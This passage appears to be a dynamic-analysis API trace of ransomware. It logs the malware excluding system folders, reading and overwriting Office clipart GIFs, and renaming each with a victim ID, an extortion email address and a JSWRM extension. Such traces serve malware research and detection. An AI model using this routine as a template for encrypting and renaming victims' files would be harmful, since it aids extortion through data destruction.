returned 5 [0073.167] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0073.167] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x23b400 [0073.167] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00011_.GIF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\ag00011_.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x460 [0073.167] GetFileSizeEx (in: hFile=0x460, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=7216) returned 1 [0073.168] SetFilePointer (in: hFile=0x460, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0073.168] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x1c30) returned 0x24c1d0 [0073.168] ReadFile (in: hFile=0x460, lpBuffer=0x24c1d0, nNumberOfBytesToRead=0x1c30, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesRead=0x345e89c*=0x1c30, lpOverlapped=0x0) returned 1 [0073.170] SetFilePointer (in: hFile=0x460, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0073.170] WriteFile (in: hFile=0x460, lpBuffer=0x24c1d0*, nNumberOfBytesToWrite=0x1c30, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesWritten=0x345e898*=0x1c30, lpOverlapped=0x0) returned 1 [0073.170] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24c1d0 | out: hHeap=0x1e0000) returned 1 [0073.170] CloseHandle (hObject=0x460) returned 1 [0073.170] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x21f6d8 [0073.170] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0073.170] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0073.170] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d260, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0073.170] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0073.170] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0073.170] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0073.170] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a438 [0073.170] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a438, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0073.170] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a438 | out: hHeap=0x1e0000) returned 1 [0073.170] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d290 [0073.170] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x2475b0 [0073.170] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d290 | out: hHeap=0x1e0000) returned 1 [0073.170] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0073.170] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00011_.GIF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\ag00011_.gif"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00011_.GIF.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\ag00011_.gif.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0073.171] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2475b0 | out: hHeap=0x1e0000) returned 1 [0073.171] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x21f6d8 | out: hHeap=0x1e0000) returned 1 [0073.171] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23b400 | out: hHeap=0x1e0000) returned 1 [0073.171] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xcb32840, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xcb32840, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xcb32840, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x3a19, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="AG00021_.GIF", cAlternateFileName="")) returned 1 [0073.171] lstrcmpiW (lpString1="AG00021_.GIF", lpString2=".") returned 1 [0073.171] lstrcmpiW (lpString1="AG00021_.GIF", lpString2="..") returned 1 [0073.171] lstrcmpiW (lpString1="AG00021_.GIF", lpString2="...") returned 1 [0073.171] lstrcmpiW (lpString1="AG00021_.GIF", lpString2="windows") returned -1 [0073.171] lstrcmpiW (lpString1="AG00021_.GIF", lpString2="recovery") returned -1 [0073.171] lstrcmpiW (lpString1="AG00021_.GIF", lpString2="perflogs") returned -1 [0073.171] lstrcmpiW (lpString1="AG00021_.GIF", lpString2="documents and settings") returned -1 [0073.171] lstrcmpiW (lpString1="AG00021_.GIF", lpString2="$RECYCLE.BIN") returned 1 [0073.171] lstrcmpiW (lpString1="AG00021_.GIF", lpString2="system volume information") returned -1 [0073.171] lstrcmpiW (lpString1="AG00021_.GIF", lpString2="msocache") returned -1 [0073.171] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2411c8 [0073.171] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="AG00021_.GIF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0073.171] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="AG00021_.GIF", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="AG00021_.GIF", lpUsedDefaultChar=0x0) returned 12 [0073.171] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2411c8 | out: hHeap=0x1e0000) returned 1 [0073.171] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241268 [0073.171] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="AG00021_.GIF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0073.171] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="AG00021_.GIF", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="AG00021_.GIF", lpUsedDefaultChar=0x0) returned 12 [0073.171] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241268 | out: hHeap=0x1e0000) returned 1 [0073.171] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x23b400 [0073.172] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2196c0 | out: hHeap=0x1e0000) returned 1 [0073.172] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0073.172] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0073.172] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2196c0 [0073.172] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00021_.GIF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\ag00021_.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x460 [0073.172] GetFileSizeEx (in: hFile=0x460, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=14873) returned 1 [0073.172] SetFilePointer (in: hFile=0x460, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0073.172] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x3a10) returned 0x24c1d0 [0073.172] ReadFile (in: hFile=0x460, lpBuffer=0x24c1d0, nNumberOfBytesToRead=0x3a10, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesRead=0x345e89c*=0x3a10, lpOverlapped=0x0) returned 1 [0073.174] SetFilePointer (in: hFile=0x460, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0073.174] WriteFile (in: hFile=0x460, lpBuffer=0x24c1d0*, nNumberOfBytesToWrite=0x3a10, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesWritten=0x345e898*=0x3a10, lpOverlapped=0x0) returned 1 [0073.175] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24c1d0 | out: hHeap=0x1e0000) returned 1 [0073.175] CloseHandle (hObject=0x460) returned 1 [0073.175] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x21f6d8 [0073.175] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0073.175] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0073.175] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d0a0, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0073.175] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0073.175] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0073.175] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0073.175] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a3d8 [0073.175] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a3d8, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0073.175] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a3d8 | out: hHeap=0x1e0000) returned 1 [0073.175] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d530 [0073.175] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x247c78 [0073.175] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d530 | out: hHeap=0x1e0000) returned 1 [0073.175] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0073.175] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00021_.GIF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\ag00021_.gif"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00021_.GIF.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\ag00021_.gif.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0073.176] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x247c78 | out: hHeap=0x1e0000) returned 1 [0073.176] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x21f6d8 | out: hHeap=0x1e0000) returned 1 [0073.176] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2196c0 | out: hHeap=0x1e0000) returned 1 [0073.176] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xcb32840, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xcb32840, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xcbcb1a5, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x1a1c, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="AG00037_.GIF", cAlternateFileName="")) returned 1 [0073.176] lstrcmpiW (lpString1="AG00037_.GIF", lpString2=".") returned 1 [0073.176] lstrcmpiW (lpString1="AG00037_.GIF", lpString2="..") returned 1 [0073.176] lstrcmpiW (lpString1="AG00037_.GIF", lpString2="...") returned 1 [0073.176] lstrcmpiW (lpString1="AG00037_.GIF", lpString2="windows") returned -1 [0073.176] lstrcmpiW (lpString1="AG00037_.GIF", lpString2="recovery") returned -1 [0073.176] lstrcmpiW (lpString1="AG00037_.GIF", lpString2="perflogs") returned -1 [0073.176] lstrcmpiW (lpString1="AG00037_.GIF", lpString2="documents and settings") returned -1 [0073.176] lstrcmpiW (lpString1="AG00037_.GIF", lpString2="$RECYCLE.BIN") returned 1 [0073.176] lstrcmpiW (lpString1="AG00037_.GIF", lpString2="system volume information") returned -1 [0073.176] lstrcmpiW (lpString1="AG00037_.GIF", lpString2="msocache") returned -1 [0073.176] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2410d8 [0073.176] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="AG00037_.GIF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0073.176] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="AG00037_.GIF", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="AG00037_.GIF", lpUsedDefaultChar=0x0) returned 12 [0073.176] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2410d8 | out: hHeap=0x1e0000) returned 1 [0073.176] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241290 [0073.176] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="AG00037_.GIF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0073.176] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="AG00037_.GIF", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="AG00037_.GIF", lpUsedDefaultChar=0x0) returned 12 [0073.176] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241290 | out: hHeap=0x1e0000) returned 1 [0073.176] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2196c0 [0073.176] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23b400 | out: hHeap=0x1e0000) returned 1 [0073.176] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0073.176] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0073.176] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x23b400 [0073.176] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00037_.GIF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\ag00037_.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x460 [0073.177] GetFileSizeEx (in: hFile=0x460, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=6684) returned 1 [0073.177] SetFilePointer (in: hFile=0x460, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0073.177] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x1a10) returned 0x24c1d0 [0073.177] ReadFile (in: hFile=0x460, lpBuffer=0x24c1d0, nNumberOfBytesToRead=0x1a10, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesRead=0x345e89c*=0x1a10, lpOverlapped=0x0) returned 1 [0073.179] SetFilePointer (in: hFile=0x460, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0073.179] WriteFile (in: hFile=0x460, lpBuffer=0x24c1d0*, nNumberOfBytesToWrite=0x1a10, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesWritten=0x345e898*=0x1a10, lpOverlapped=0x0) returned 1 [0073.179] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24c1d0 | out: hHeap=0x1e0000) returned 1 [0073.179] CloseHandle (hObject=0x460) returned 1 [0073.179] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x21f6d8 [0073.180] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0073.180] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0073.180] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d260, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0073.180] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0073.180] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0073.180] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0073.180] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a480 [0073.180] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a480, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0073.180] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a480 | out: hHeap=0x1e0000) returned 1 [0073.180] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d920 [0073.180] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x247990 [0073.180] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d920 | out: hHeap=0x1e0000) returned 1 [0073.180] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0073.180] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00037_.GIF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\ag00037_.gif"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00037_.GIF.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\ag00037_.gif.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0073.180] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x247990 | out: hHeap=0x1e0000) returned 1 [0073.180] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x21f6d8 | out: hHeap=0x1e0000) returned 1 [0073.180] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23b400 | out: hHeap=0x1e0000) returned 1 [0073.180] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xcb58a9e, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xcb58a9e, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xd790bed, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0xcb3, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="AG00038_.GIF", cAlternateFileName="")) returned 1 [0073.181] lstrcmpiW (lpString1="AG00038_.GIF", lpString2=".") returned 1 [0073.181] lstrcmpiW (lpString1="AG00038_.GIF", lpString2="..") returned 1 [0073.181] lstrcmpiW (lpString1="AG00038_.GIF", lpString2="...") returned 1 [0073.181] lstrcmpiW (lpString1="AG00038_.GIF", lpString2="windows") returned -1 [0073.181] lstrcmpiW (lpString1="AG00038_.GIF", lpString2="recovery") returned -1 [0073.181] lstrcmpiW (lpString1="AG00038_.GIF", lpString2="perflogs") returned -1 [0073.181] lstrcmpiW (lpString1="AG00038_.GIF", lpString2="documents and settings") returned -1 [0073.181] lstrcmpiW (lpString1="AG00038_.GIF", lpString2="$RECYCLE.BIN") returned 1 [0073.181] lstrcmpiW (lpString1="AG00038_.GIF", lpString2="system volume information") returned -1 [0073.181] lstrcmpiW (lpString1="AG00038_.GIF", lpString2="msocache") returned -1 [0073.181] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241330 [0073.181] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="AG00038_.GIF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0073.181] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="AG00038_.GIF", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="AG00038_.GIF", lpUsedDefaultChar=0x0) returned 12 [0073.181] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241330 | out: hHeap=0x1e0000) returned 1 [0073.181] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240fe8 [0073.181] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="AG00038_.GIF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0073.181] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="AG00038_.GIF", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="AG00038_.GIF", lpUsedDefaultChar=0x0) returned 12 [0073.181] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240fe8 | out: hHeap=0x1e0000) returned 1 [0073.181] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x23b400 [0073.181] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2196c0 | out: hHeap=0x1e0000) returned 1 [0073.181] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0073.181] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0073.181] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2196c0 [0073.181] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00038_.GIF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\ag00038_.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x460 [0073.181] GetFileSizeEx (in: hFile=0x460, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=3251) returned 1 [0073.182] SetFilePointer (in: hFile=0x460, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0073.182] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xcb0) returned 0x24c1d0 [0073.182] ReadFile (in: hFile=0x460, lpBuffer=0x24c1d0, nNumberOfBytesToRead=0xcb0, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesRead=0x345e89c*=0xcb0, lpOverlapped=0x0) returned 1 [0073.421] SetFilePointer (in: hFile=0x460, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0073.421] WriteFile (in: hFile=0x460, lpBuffer=0x24c1d0*, nNumberOfBytesToWrite=0xcb0, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesWritten=0x345e898*=0xcb0, lpOverlapped=0x0) returned 1 [0073.431] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24c1d0 | out: hHeap=0x1e0000) returned 1 [0073.431] CloseHandle (hObject=0x460) returned 1 [0073.431] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 